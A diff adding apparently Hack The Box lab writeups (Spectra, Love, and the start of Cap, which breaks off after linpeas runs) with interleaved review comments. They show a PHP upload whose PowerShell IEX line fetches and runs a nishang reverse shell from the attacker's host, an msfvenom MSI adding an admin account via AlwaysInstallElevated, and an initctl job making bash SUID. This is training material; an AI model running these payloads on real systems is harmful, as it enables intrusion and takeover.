+ Warning: Permanently added 'spectra.htb,10.129.186.23' (RSA) to the list of known hosts.
+ Password:
+ katie@spectra ~ $ id
+ uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
+ katie@spectra ~ $ cat user.txt
+ e8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there we go! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root flag we first need to enumerate the box. To do that we can use linpeas.sh:
+
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K Aug 9 15:52 linpeas.sh
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ katie@spectra ~ $ wget http://10.10.14.34:9090/linpeas.sh -O /tmp/linpeas.sh
+ --2021-08-09 07:50:17-- http://10.10.14.34:9090/linpeas.sh
+ Connecting to 10.10.14.34:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: '/tmp/linpeas.sh'
+
+ /tmp/linpeas.sh 100%[======================================================================================================================================================>] 333.85K 143KB/s in 2.3s
+
+ 2021-08-09 07:50:21 (143 KB/s) - '/tmp/linpeas.sh' saved [341863/341863]
+
+ katie@spectra ~ $ chmod +x /tmp/linpeas.sh
+ katie@spectra ~ $ /tmp/linpeas.sh
+ -bash: /tmp/linpeas.sh: Permission denied
+
+
+
+However there's a problem since we cannot run it, therefore we check it manually, our first reflex is to check **sudo -l** :
+
+
+ katie@spectra ~ $ sudo -l
+ User katie may run the following commands on spectra:
+ (ALL) SETENV: NOPASSWD: /sbin/initctl
+
+
+
+Here it looks like we can run /sbin/initctl without any password, so let's look for a gtfobin:
+
+
+
+However there's no gtfobin for it.
+
+
+ katie@spectra ~ $ sudo initctl
+ initctl: missing command
+ Try `initctl --help' for more information.
+ katie@spectra ~ $ sudo initctl --help
+ Usage: initctl [OPTION]... COMMAND [OPTION]... [ARG]...
+
+ Options:
+ --session use D-Bus session bus to connect to init daemon (for testing)
+ --system use D-Bus system bus to connect to init daemon
+ --dest=NAME destination well-known name on D-Bus bus
+ -q, --quiet reduce output to errors only
+ -v, --verbose increase output to include informational messages
+ --help display this help and exit
+ --version output version information and exit
+
+ For a list of commands, try `initctl help'.
+
+
+
+Here we can see that this binary can be used to communicate and interact with the upstart init daemon, processes managed by init are defined by files in the **/etc/init** directory. So we can create a **privesc.conf** file in /etc/init, however the directory itself is owned by the root user, therefore we need to access it with another group, the **developers** group:
+
+
+ katie@spectra /etc/init $ id
+ uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
+ katie@spectra /etc/init $ ls -lash | grep developers
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test1.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test10.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test2.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test3.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test4.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test5.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test6.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test7.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test8.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test9.conf
+
+
+
+So since we can only access these .conf files we're going to have our privesc file into **test.conf** so let's edit it to change permissions on the bash binary:
+
+
+ katie@spectra /etc/init $ vim test.conf
+ katie@spectra /etc/init $ cat test.conf
+ script
+ chmod +s /bin/bash
+ end script
+ katie@spectra /etc/init $ sudo /sbin/initctl start test
+ test start/running, process 21674
+ katie@spectra /etc/init $ /bin/bash -p
+ bash-4.3# id
+ uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)
+ bash-4.3# cat /root/root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
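Review bot: the sentence "so let's look for a gtfobin:" at the top of Part 3 and "Here we can see the progress graph :" in the Conclusion are both followed by an empty gap where an image was evidently meant to be embedded; add the image references or drop the lead-in sentences so the text does not point at nothing. The "Permission denied" on /tmp/linpeas.sh immediately after chmod +x is also left unexplained before the pivot to manual checks; one sentence on why a file under /tmp cannot be executed here (for example by showing the mount options of /tmp) would make the reasoning easier to follow. The escalation itself could name the actual weakness rather than only the steps: the root-owned /etc/init/test*.conf files are mode rw-rw---- with group developers, and sudo lets katie run /sbin/initctl as root with NOPASSWD and SETENV, so any member of developers can have the init daemon execute a script as root. Stating that makes the fix obvious for a defender (remove group write on those job files, or drop the sudo rule) and also explains why the writeup ends up editing the existing test.conf instead of creating the privesc.conf it first proposes, since the directory itself is root-owned and not writable.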
diff --git a/Easy/61.md b/Easy/61.md
new file mode 100644
index 0000000..672399b
--- /dev/null
+++ b/Easy/61.md
@@ -0,0 +1,363 @@
+# Love Writeup
+
+
+
+## Introduction :
+
+Love is an easy Windows box released back in May 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ → nmap -vvv -p- 10.129.48.103 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 135/tcp on 10.129.48.103
+ Discovered open port 3306/tcp on 10.129.48.103
+ Discovered open port 80/tcp on 10.129.48.103
+ Discovered open port 445/tcp on 10.129.48.103
+ Discovered open port 443/tcp on 10.129.48.103
+ Discovered open port 139/tcp on 10.129.48.103
+ Discovered open port 7680/tcp on 10.129.48.103
+ Discovered open port 49668/tcp on 10.129.48.103
+ Discovered open port 49667/tcp on 10.129.48.103
+ Discovered open port 49664/tcp on 10.129.48.103
+ Discovered open port 47001/tcp on 10.129.48.103
+ Discovered open port 49666/tcp on 10.129.48.103
+ Discovered open port 5040/tcp on 10.129.48.103
+ Discovered open port 49669/tcp on 10.129.48.103
+ Discovered open port 49665/tcp on 10.129.48.103
+ Discovered open port 49670/tcp on 10.129.48.103
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ → nmap -sCV -p135,80,139,445,443 10.129.48.103
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 20:19 CEST
+ Nmap scan report for 10.129.48.103
+ Host is up (0.45s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
+ | http-cookie-flags:
+ | /:
+ | PHPSESSID:
+ |_ httponly flag not set
+ |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ |_http-title: Voting System using PHP
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
+ |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ |_http-title: 403 Forbidden
+ | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
+ | Not valid before: 2021-01-18T14:00:16
+ |_Not valid after: 2022-01-18T14:00:16
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
+ Service Info: Hosts: www.example.com, LOVE; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 2h41m33s, deviation: 4h02m31s, median: 21m32s
+ | smb-os-discovery:
+ | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
+ | OS CPE: cpe:/o:microsoft:windows_10::-
+ | Computer name: Love
+ | NetBIOS computer name: LOVE\x00
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2021-08-10T11:41:29-07:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-08-10T18:41:32
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 39.83 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 at love.htb (see the SSL Cert) so let's investigate it:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.129.48.103 love.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping love.htb
+ PING love.htb (10.129.48.103) 56(84) bytes of data.
+ 64 bytes from love.htb (10.129.48.103): icmp_seq=1 ttl=127 time=24.4 ms
+ 64 bytes from love.htb (10.129.48.103): icmp_seq=2 ttl=127 time=28.5 ms
+ 64 bytes from love.htb (10.129.48.103): icmp_seq=3 ttl=127 time=23.3 ms
+ ^C
+ --- love.htb ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+ rtt min/avg/max/mdev = 23.337/25.387/28.458/2.211 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ →
+
+
+` 
+
+Here we get a login form, nothing interesting there, so we check out the subdomain that our nmap scan picked up at **staging.love.htb** after editing our /etc/hosts file:
+
+
+ o
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB]
+ → cat /etc/hosts | grep love.htb
+ 10.129.48.103 staging.love.htb love.htb
+
+
+` 
+
+Clicking on 'Demo', redirects us to **/beta.php** which wants us to specify an URL to scan a file:
+
+
+
+So here we can apparently get the box to scan what it interprets as local addresses, so let's try the other ports our nmap scan picked up:
+
+
+
+Here's why this is an easy box, using the file scan feature we make it scan it's own port 5000 that our nmap scan picked up and the html file it returns is basically showing us admin credentials with the password **@LoveIsInTheAir!!!!**
+
+So for the next step let's use the credentials we just got to login as admin into the love.htb login form we found earlier:
+
+ 
+
+And we're logged in as the "Neo Devierte" user! Now from here we navigate to the 'voters' page:
+
+ 
+
+So here's the plan:
+
+
+
+So from here we know a few things, first this is a windows machine, so we know that we will probably need a reverse shell **payload for powershell** , probably we're going to use **[nishang's revshell ps1](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell)** for that, Second of all we know that this box uses **php** , therefore we need a payload to make the box run **exec()** to download our revshell ps1 payload and execute it in order to get a reverse shell, so we prepare our 2 payloads:
+
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/13 ] [~/HTB/Love]
+ → nc -lvnp 9001
+ Listening on 0.0.0.0 9001
+
+
+ [term2]
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → curl https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > revshell.ps1
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 4339 100 4339 0 0 61112 0 --:--:-- --:--:-- --:--:-- 61112
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → vim revshell.ps1
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → tail -n2 revshell.ps1
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 9001
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → vim shell.php
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → cat shell.php
+ <****?php echo exec("powershell IEX (New-Object Net.WebClient).DownloadString('**http://10.10.14.34:9090/revshell.ps1** ')"); ?>
+
+
+
+Now we're going to host the **revshell.ps1** payload we just made with a simple python3 http server **on port 9090**
+
+
+ [term2]
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → cat shell.php
+ <****?php echo exec("powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.34/revshell.ps1')"); ?>
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → cat revshell.ps1 | tail -n2
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 9001
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+Once that's done, we upload our shell.php file through the image upload and see if we get a reverse shell connection back:
+
+ 
+
+We successfully managed to upload our shell.php file as the voter's profile picture, and when we check our terminal we see that our plan got executed:
+
+
+ [term2]
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.48.103 - - [13/Aug/2021 21:49:33] "GET /revshell.ps1 HTTP/1.1" 200 -
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/13 ] [~/HTB/Love]
+ → nc -lvnp 9001
+ Listening on 0.0.0.0 9001
+ Connection received on 10.129.48.103 62349
+ Windows PowerShell running as user Phoebe on LOVE
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\xampp\htdocs\omrs\images>whoami
+ love\phoebe
+
+
+And we have a reverse shell back! Now let's see if we can get to the user's flag:
+
+
+ PS C:\xampp\htdocs\omrs\images> cd ~
+ PS C:\Users\Phoebe> ls
+
+
+ Directory: C:\Users\Phoebe
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 4/12/2021 3:50 PM 3D Objects
+ d-r--- 4/12/2021 3:50 PM Contacts
+ d-r--- 4/13/2021 3:20 AM Desktop
+ d-r--- 4/12/2021 3:50 PM Documents
+ d-r--- 4/13/2021 9:55 AM Downloads
+ d-r--- 4/12/2021 3:50 PM Favorites
+ d-r--- 4/12/2021 3:50 PM Links
+ d-r--- 4/12/2021 3:50 PM Music
+ d-r--- 4/12/2021 3:52 PM OneDrive
+ d-r--- 4/21/2021 7:01 AM Pictures
+ d-r--- 4/12/2021 3:50 PM Saved Games
+ d-r--- 4/12/2021 3:51 PM Searches
+ d-r--- 4/23/2021 3:39 AM Videos
+
+
+ PS C:\Users\Phoebe> type Desktop\user.txt
+ b2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we have been able to get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the Administrator Privileges, we need to enumerate the box, let's do so using **Invoke-winPEAS.ps1** by powershell-empire:
+
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → locate winPEAS | grep ps1
+ /home/nothing/HTB/Buff/Invoke-winPEAS.ps1
+ /home/nothing/HTB/Omni/SirepRAT/Invoke-winPEAS.ps1
+ /home/nothing/HTB/Sauna/Invoke-winPEAS.ps1
+ /usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-winPEAS.ps1
+
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → cp /home/nothing/HTB/Buff/Invoke-winPEAS.ps1 .
+
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ PS C:\Users\Phoebe> curl http://10.10.14.34:9090/Invoke-winPEAS.ps1 -o peas.ps1
+ PS C:\Users\Phoebe> ls
+
+
+ Directory: C:\Users\Phoebe
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 4/12/2021 3:50 PM 3D Objects
+ d-r--- 4/12/2021 3:50 PM Contacts
+ d-r--- 4/13/2021 3:20 AM Desktop
+ d-r--- 4/12/2021 3:50 PM Documents
+ d-r--- 4/13/2021 9:55 AM Downloads
+ d-r--- 4/12/2021 3:50 PM Favorites
+ d-r--- 4/12/2021 3:50 PM Links
+ d-r--- 4/12/2021 3:50 PM Music
+ d-r--- 4/12/2021 3:52 PM OneDrive
+ d-r--- 4/21/2021 7:01 AM Pictures
+ d-r--- 4/12/2021 3:50 PM Saved Games
+ d-r--- 4/12/2021 3:51 PM Searches
+ d-r--- 4/23/2021 3:39 AM Videos
+ -a---- 8/13/2021 1:24 PM 233056 peas.ps1
+
+
+
+ PS C:\Users\Phoebe> import-module ./peas.ps1
+ PS C:\Users\Phoebe> Invoke-winPEAS
+
+
+` 
+
+Let it run a bit, and then scrolling down we see the following:
+
+
+
+So when these 2 registers are enabled, then users of any privilege can install **.msi** files as **NT AUTHORITY\SYSTEM** , therefore we can simply go to the suggested link to hacktricks.xyz [here](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated):
+
+
+
+TLDR we're going to generate a malicious **privesc.msi** file using **metasploit** in order to create an account with admin permissions to be able to access the box remotely with admin access:
+
+
+ [term 1]
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder specified, outputting raw payload
+ Payload size: 284 bytes
+ Final size of msi file: 159744 bytes
+ Saved as: alwe.msi
+
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.48.103 - - [13/Aug/2021 22:39:22] "GET /alwe.msi HTTP/1.1" 200 -
+
+ [term 2]
+ PS C:\Users\Phoebe> curl http://10.10.14.34:9090/alwe.msi -o privesc.msi
+ PS C:\Users\Phoebe> msiexec /qn /i privesc.msi
+
+ [term 3]
+ [ 10.10.14.34/23 ] [ /dev/pts/15 ] [~/HTB/Love]
+ → evil-winrm -u rottenadmin -p 'P@ssword123!' -i 10.129.48.103
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\rottenadmin\Documents> cd C:\Users\Administrator\Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
+ c7XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
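Review bot: the two listings of shell.php disagree on the download URL: the first cat shows "http://10.10.14.34:9090/revshell.ps1" while the second shows "http://10.10.14.34/revshell.ps1" with no port, yet the python3 http.server log later records the GET on port 9090, so the second listing looks like a transcription error and should match the first. The sentence "we make it scan it's own port 5000 that our nmap scan picked up" is not supported by the scan output above, which lists 5040 and the high ports but no 5000; either the port number or the claim about nmap needs correcting, and the fact that the beta.php "file scan" can be pointed at the host's own loopback services is worth naming as an SSRF, since that is the bug a defender would track and fix. Several explanatory sentences ("let's investigate it:", "Clicking on 'Demo'", "So here's the plan:", "we see the following:", the Conclusion's "progress graph") are followed only by blank lines or a stray "` " line, so the screenshots they refer to are missing from the diff. Markup residue such as "<****?php" in the code listings and the "**http://...**" bold markers inside the PHP string should be cleaned up, as they make the snippet invalid if copied verbatim. Finally, "these 2 registers" in Part 3 should read "registry values" (the AlwaysInstallElevated values in the registry that the linked hacktricks page describes).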
diff --git a/Easy/62.md b/Easy/62.md
new file mode 100644
index 0000000..c5df149
--- /dev/null
+++ b/Easy/62.md
@@ -0,0 +1,229 @@
+# Cap Writeup
+
+
+
+## Introduction :
+
+Cap is an Easy linux box released back in June 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → cat /etc/hosts | tail -n1
+ 10.129.111.61 cap.htb
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → nmap -sCV cap.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 18:26 CEST
+ Nmap scan report for cap.htb (10.129.111.61)
+ Host is up (0.041s latency).
+ Not shown: 997 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
+ | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
+ |_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
+ 80/tcp open http gunicorn
+ |_http-server-header: gunicorn
+ |_http-title: Security Dashboard
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.0 404 NOT FOUND
+ | Server: gunicorn
+ | Date: Thu, 28 Apr 2022 16:27:05 GMT
+ | Connection: close
+ | Content-Type: text/html; charset=utf-8
+ | Content-Length: 232
+ | <****!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
+ | <****title>404 Not Found
+ | <****h1>Not Found
+
+
+ | <****p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. <****/p>
+ | GetRequest:
+ | HTTP/1.0 200 OK
+ | Server: gunicorn
+ | Date: Thu, 28 Apr 2022 16:26:59 GMT
+ | Connection: close
+ | Content-Type: text/html; charset=utf-8
+ | Content-Length: 19386
+
+ [...]
+
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 130.33 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+So as we can see, the mentionned ip (10.10.14.57) in the pcap file is my IP, and the file is titled 1.pcap. So let's dirbust the website to find other pcap files using gobuster:
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/31 ] [~/HTB]
+ → gobuster dir -u http://cap.htb/data/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/common.txt -b 302,403,404
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://cap.htb/data/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 302,403,404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/04/28 18:45:14 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /0 (Status: 200) [Size: 17147]
+ /01 (Status: 200) [Size: 17144]
+ /1 (Status: 200) [Size: 17144]
+ /00 (Status: 200) [Size: 17147]
+
+ ===============================================================
+ 2022/04/28 18:45:19 Finished
+ ===============================================================
+
+
+
+Gobuster found the /0 directory so let's go see what is in it:
+
+
+
+going to http://cap.htb/0/ we find the 0.pcap which contains packet information regarding the nathan user's password **Buck3tH4TF0RM3!**. So let's try to login via SSH with his credentials:
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/31 ] [~/HTB]
+ → ssh nathan@cap.htb
+ The authenticity of host 'cap.htb (10.129.111.61)' can't be established.
+ ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'cap.htb' (ED25519) to the list of known hosts.
+ nathan@cap.htb's password:
+ Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu Apr 28 16:52:29 UTC 2022
+
+ System load: 0.0
+ Usage of /: 36.7% of 8.73GB
+ Memory usage: 21%
+ Swap usage: 0%
+ Processes: 226
+ Users logged in: 0
+ IPv4 address for eth0: 10.129.111.61
+ IPv6 address for eth0: dead:beef::250:56ff:fe96:4e24
+
+ => There are 2 zombie processes.
+
+ * Super-optimized for small spaces - read how we shrank the memory
+ footprint of MicroK8s to make it the smallest full K8s around.
+
+ https://ubuntu.com/blog/microk8s-memory-optimisation
+
+ 63 updates can be applied immediately.
+ 42 of these updates are standard security updates.
+ To see these additional updates run: apt list --upgradable
+
+
+ The list of available updates is more than a week old.
+ To check for new updates run: sudo apt update
+
+ Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
+ nathan@cap:~$ cat user.txt
+ 54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get Root access we need to enumerate the machine, to do that we use linpeas.sh:
+
+
+ [term1]
+ [ 10.10.14.57/23 ] [ /dev/pts/34 ] [~/HTB/Cap]
+ → wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/linpeas.sh
+ --2022-04-28 19:02:02-- https://github.com/carlospolop/PEASS-ng/releases/download/20220424/linpeas.sh
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 52.69.186.44
+ Connecting to github.com (github.com)|52.69.186.44|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/081066de-a078-45b2-bfb8-06253be16e3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220428T170203Z&X-Amz-Expires;=300&X-Amz-Signature;=1f55ea92c90e5d3e1cdc14915367707f214da89d55934a919e20dbde9ba79ac6&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream [following]
+ --2022-04-28 19:02:03-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/081066de-a078-45b2-bfb8-06253be16e3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220428T170203Z&X-Amz-Expires;=300&X-Amz-Signature;=1f55ea92c90e5d3e1cdc14915367707f214da89d55934a919e20dbde9ba79ac6&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream
+ Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/octet-stream]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[===========================================================================================================================>] 757.98K 3.67MB/s in 0.2s
+
+ 2022-04-28 19:02:04 (3.67 MB/s) - ‘linpeas.sh’ saved [776167/776167]
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/34 ] [~/HTB/Cap]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.111.61 - - [28/Apr/2022 19:02:24] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [term2]
+ nathan@cap:~$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ nathan@cap:~$ wget http://10.10.14.57:9090/linpeas.sh -O /tmp/linpeas.sh
+ --2022-04-28 17:02:24-- http://10.10.14.57:9090/linpeas.sh
+ Connecting to 10.10.14.57:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/linpeas.sh’
+
+ /tmp/linpeas.sh 100%[===========================================================================================================================>] 757.98K 1.87MB/s in 0.4s
+
+ 2022-04-28 17:02:24 (1.87 MB/s) - ‘/tmp/linpeas.sh’ saved [776167/776167]
+
+ nathan@cap:~$ chmod +x /tmp/linpeas.sh
+ nathan@cap:~$ /tmp/linpeas.sh
+
+
+
+`  
+
